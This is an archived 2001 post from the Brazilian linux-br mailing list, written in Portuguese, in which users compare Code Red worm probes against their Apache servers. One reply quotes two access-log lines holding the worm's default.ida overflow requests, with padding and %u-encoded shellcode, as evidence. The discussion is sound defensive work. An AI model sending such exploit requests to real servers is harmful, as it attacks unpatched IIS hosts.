Re: (linux-br) CODE RED

Mon, 13 Aug 2001 05:31:44 -0700 

Meu Apache(Linux) tamb�m apresenta o mesmo log do Cod Red I que voc�
descreve abaixo.

Quais os perigos ou o que fazer????

Z� Lu�s


OSx wrote:
> 
> On Sun, 12 Aug 2001 09:37:17 -0300
> "Wagner Moura" <[EMAIL PROTECTED]> wrote:
> > Verifique os Log's e decibri que
> > uma maquina estava insistentimente buscando a pagina
> > "http:\\server.default....", e o log de acesso ao Squid, estava Imenso. Como
> > medida imediada, bloqueeio Ip da maquina, e fui verificar o que estava
> > acontecendo. Qual nao foi a minha surpresa, um estagiario do curso de
> > computacao, instalou o rWindows2000 em uma das maquinas clientes para fazer
> > teste, e esta maquina foi infectada pelo CODE RED.
> 
> Isso nao eh o Code Red, nem o I, nem o II, e nem o III. O Code Red tentou atacar o 
>meu apache mais de 1000 vezes(www.0sx.hpg.com.br/red.html) ate que o meu provedor 
>resolveu fechar a porta 80 para todos os usuarios. Aqui vai um exemplo de uma 
>tentativa de ataque do Code Red I:
> 63.65.179.2 - - [03/Aug/2001:04:47:18 -0400] "GET 
>/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> 
>NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> 
>NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%
> u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 252 "-" "-"
> 
> e aqui vai um exemplo do II:
> 66.1.210.219 - - [04/Aug/2001:12:25:45 -0400] "GET 
>/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> 
>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> 
>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3
> %u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 205 "-" "-"
> 
> o III eu nao cheguei a ser atacado, porque o meu provedor fechou a porta 80 antes.
> 
> []'s
> OSx
> 


Assinantes em 13/08/2001: 2278
Mensagens recebidas desde 07/01/1999: 127545
Historico e [des]cadastramento: http://linux-br.conectiva.com.br
Assuntos administrativos e problemas com a lista:
            mailto:[EMAIL PROTECTED]

Responder a